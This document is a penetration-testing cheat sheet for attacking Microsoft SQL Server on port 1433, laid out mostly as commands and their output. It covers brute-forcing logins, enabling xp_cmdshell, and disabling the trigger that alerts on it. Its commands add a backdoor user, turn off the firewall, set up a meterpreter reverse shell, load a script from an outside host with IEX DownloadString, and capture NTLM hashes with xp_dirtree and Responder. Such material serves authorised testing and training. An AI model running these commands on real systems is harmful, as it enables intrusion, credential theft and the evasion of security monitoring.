1433 - Microsoft SQL

Microsoft SQL Server is a relational database management system developed by Microsoft.

Normal Port - 1433

Hidden mode port - 2433

Connect

Connect using one of the following options:

sqsh

sqsh -S someserver -U sa -P password

metasploit

metasploit (mssql_login)

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

mssqclient

Impacket script mssqclient

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

sqlcmd

sqlcmd. To use SQL Server Authentication, you must specify a user name and password by using the -U and -P options.

sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"

crackmapexec

cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

MSSQL 2003 commands

taken from: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

MSSQL 2017 Commands

Current user’s permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
entity_name    subentity_name    permission_name 
------------   ---------------   ------------------ 
server                           CONNECT SQL 
server                           VIEW ANY DATABASE

Check out the databases available:

SQL> SELECT name FROM master.sys.databases 
name 
----------- 
master 
tempdb 
model 
msdb 
volume 

I can look for user generated tables on those databases:

SQL> use volume 
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume 
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'. 
SQL> SELECT name FROM sysobjects WHERE xtype = 'U' 
name 
------------     

Enumeration

Nmap

Scan:

nmap -sU --script=ms-sql-info 192.168.1.108

Dump hashes:

nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>

Execute command:

nmap -Pn -n -sS –script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 –script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd=”net user backdoor backdoor123 /add”

Metasploit

Find MSSQL servers:

msf > use auxiliary/scanner/mssql/mssql_ping

mssql_enum

The mssql_enum is an admin module that will accept a set of credentials and query a MSSQL for various configuration settings.

msf auxiliary(mssql_enum) > run 
[*] Running MS SQL Server Enumeration... 
[*] Version: 
[*] Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)  
[*] Oct 14 2005 00:33:37  
[*] Copyright (c) 1988-2005 Microsoft Corporation 
[*] Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2) 
[*] Configuration Parameters: 
[*] C2 Audit Mode is Not Enabled 
[*] xp_cmdshell is Not Enabled 
[*] remote access is Enabled 
[*] allow updates is Not Enabled 
[*] Database Mail XPs is Not Enabled 
[*] Ole Automation Procedures are Not Enabled 
[*] Databases on the server: 
[*] Database name:master 
[*] Database Files for master: 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf 
[*] Database name:tempdb 
[*] Database Files for tempdb: 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf 
[*] Database name:model 
[*] Database Files for model: 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf 
[*] Database name:msdb 
[*] Database Files for msdb: 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf 
[*] c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf 
[*] System Logins on this Server: 
[*] sa 
[*] ##MS_SQLResourceSigningCertificate## 
[*] ##MS_SQLReplicationSigningCertificate## 
[*] ##MS_SQLAuthenticatorCertificate## 
[*] ##MS_AgentSigningCertificate## 
[*] BUILTIN\Administrators 
[*] NT AUTHORITY\SYSTEM 
[*] V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS 
[*] BUILTIN\Users 
[*] Disabled Accounts: 
[*] No Disabled Logins Found 

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable 
CMD => netsh firewall set opmode disable 
msf auxiliary(mssql_exec) > set PASSWORD password1 
PASSWORD => password1 
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195 
RHOST => 192.168.1.195 
msf auxiliary(mssql_exec) > run 
[*] The server may have xp_cmdshell disabled, trying to enable it... 
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable' 
 output 
 ------ 
 Ok. 
[*] Auxiliary module execution completed 
msf auxiliary(mssql_exec) > 

PowerUpSQL

PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server

Link: https://github.com/NetSPI/PowerUpSQL

Example:

PS /opt/PowerUpSQL> Import-Module .\PowerUpSQL.psd1  
PS /opt/PowerUpSQL> Get-SQLInstanceDomain -Verbose 

ComputerName     : sql01.HTB.local
Instance         : sql01.HTB.local,1433
DomainAccountSid : 1500000521000221246588323062601712516458121134400
DomainAccount    : MSSQLSERVER$
DomainAccountCn  : MSSQLSERVER
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql01.HTB.local
LastLogon        : 13/01/2021 02:56
Description      : 

PS /opt/PowerUpSQL> Get-SQLInstanceDomain | Get-SQLConnectionTest

ComputerName          Instance                   Status        
------------          --------                   ------        
sql01.HTB.local       sql01.HTB.local,1433       Accessible       

Or load into memory

IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.0.1/PowerUpSQL.ps1")

SQL Server Discovery Cheats

More commands can be found in the github repo or in the tool section.

Linked Servers

Microsoft SQL Server allows links to be created to external data sources such as other SQL servers, Oracle databases, excel spreadsheets, and so on. Due to common misconfigurations the links, or “Linked Servers”, can often be exploited to traverse database link networks, gain unauthorized access to data, and deploy shells.

Source: https://blog.netspi.com/how-to-hack-database-links-in-sql-server/

Find linked servers:

SQL> select srvname from sysservers;
srvname
------------------------------   
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC  

Execute commands on the other server:

SQL> EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG];
------------------------------   
COMPATIBILITY\POO_CONFIG 

Bruteforce login

Metasploit

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_login

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload 
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Nmap

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt <host>

Enable xp_cmdshell

Check if enabled

xp_cmdshell whoami

Or

EXEC xp_cmdshell 'net user'; -- priv

Or

EXEC master.dbo.xp_cmdshell 'cmd';

Enable xp_cmdshell

Short way:

SQL> enable_xp_cmdshell

Long way:

EXEC sp_configure 'show advanced options', 1; -- priv 
RECONFIGURE; -- priv 
EXEC sp_configure 'xp_cmdshell', 1; -- priv 
RECONFIGURE; -- priv 
or 
EXEC sp_configure 'show advanced options', 1; 
EXEC sp_configure reconfigure; 
EXEC sp_configure 'xp_cmdshell', 1; 
EXEC sp_configure reconfigure; 

Check if it works

xp_cmdshell 'dir C:\'

Disable Trigger

If you get a error when we try to enable xp_cmdshell on trigger, such as:

Line 181: The transaction ended in the trigger. The batch has been aborted.

These triggers are a policy put in place to alert and block attempts to enable and use xp_cmdshell. The problem is, as sa, we can disable these triggers.

SQL> disable trigger ALERT_xp_cmdshell on all server

And then enable xp_cmdshell

SQL> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output                                                                             
------------------------------   
nt service\mssql$poo_public                                                        
NULL

Capture credentials using xp_dirtree

Capture credentials using responder and xp_dirtree:

Start Responder:

root@kali# responder -I eth0

Issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on our host:

SQL> xp_dirtree '\\10.10.14.14\a'; 
subdirectory    depth 

It doesn’t return anything, but in the responder window, I’ve captured the necessary information:

[SMBv2] NTLMv2-SSP Client   : 10.10.10.125 
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc 
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:603386f497f
[*] Skipping previously captured hash for QUERIER\mssql-svc 

Execue_external_script

We can use sp_execute_external_scrip to execute external command,

SQL Server 2017 now supports Python as an extensible script engine and we can use it to execute commands:

SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
compatibility\poo_public01

Express Edition will continue to be enforced.

Last updated